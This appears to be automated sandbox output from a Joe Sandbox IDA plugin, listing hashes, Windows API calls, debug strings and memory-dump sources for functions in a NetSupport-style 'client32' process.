• Opcode ID: 20d55293dd5fa1f4e889e7781169e96fca4c20f63d10528dafaeeb9acde81bac
• Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
• Opcode Fuzzy Hash: 20d55293dd5fa1f4e889e7781169e96fca4c20f63d10528dafaeeb9acde81bac
• Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50
APIs
• MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
  • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
• EqualRect.USER32(?,?), ref: 1107740C
• SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
Strings
• m_hWnd, xrefs: 11077447
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$DeferEqualPointsRect
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2754115966-2830328467
• Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
• Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
• Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
• Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
APIs
• _malloc.LIBCMT ref: 1104971C
• _free.LIBCMT ref: 11049779
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
• ReleaseSmartcardDevice called, xrefs: 110496BD
• CLTCONN.CPP, xrefs: 11049708
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
• String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
• API String ID: 3300666597-3188990991
• Opcode ID: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
• Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
• Opcode Fuzzy Hash: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
• Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
APIs
• GetMenu.USER32(?), ref: 110BD4A4
• GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
• DrawMenuBar.USER32(?), ref: 110BD50D
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110BD493
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 381722633-2830328467
                                                                                                                                                    • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                                                                                    • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                                                                                                    • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                                                                                    • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                                                                                                    • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                                                                                                    • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                                                                                                    Strings
                                                                                                                                                    • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                                                                                    • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked$DecrementIncrementVersion
                                                                                                                                                    • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                                                                                    • API String ID: 1284810544-229394064
                                                                                                                                                    • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                                                                                    • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                                                                                    • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                                                                                    • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                                                                                    • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                                                                                    • RegisterClassA.USER32(?), ref: 11093483
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                                                                    • String ID: NSMClassList
                                                                                                                                                    • API String ID: 2883182437-2474587545
                                                                                                                                                    • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                                    • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                                                                                    • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                                    • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                                                                                                    • wsprintfA.USER32 ref: 1114568E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                                    • API String ID: 104907563-3240211118
                                                                                                                                                    • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                                                                                    • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                                                                                    • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                                                                                    • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                    • API String ID: 145871493-545709139
                                                                                                                                                    • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                                                                    • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                                                                                    • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                                                                    • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                                                                    • API String ID: 2446111109-1196874063
                                                                                                                                                    • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                                                    • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                                                                                    • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                                                    • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                                                                                    • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageWindow$FindLongPostSend
                                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                                    • API String ID: 3445528842-293399287
                                                                                                                                                    • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                                    • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                                                                                    • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                                    • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                                                                                    APIs
                                                                                                                                                    • __strdup.LIBCMT ref: 6CA9AC64
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 6CA9ACA1
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6CA9ACB7
                                                                                                                                                    • _malloc.LIBCMT ref: 6CA9ACC6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6CA9ACE0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
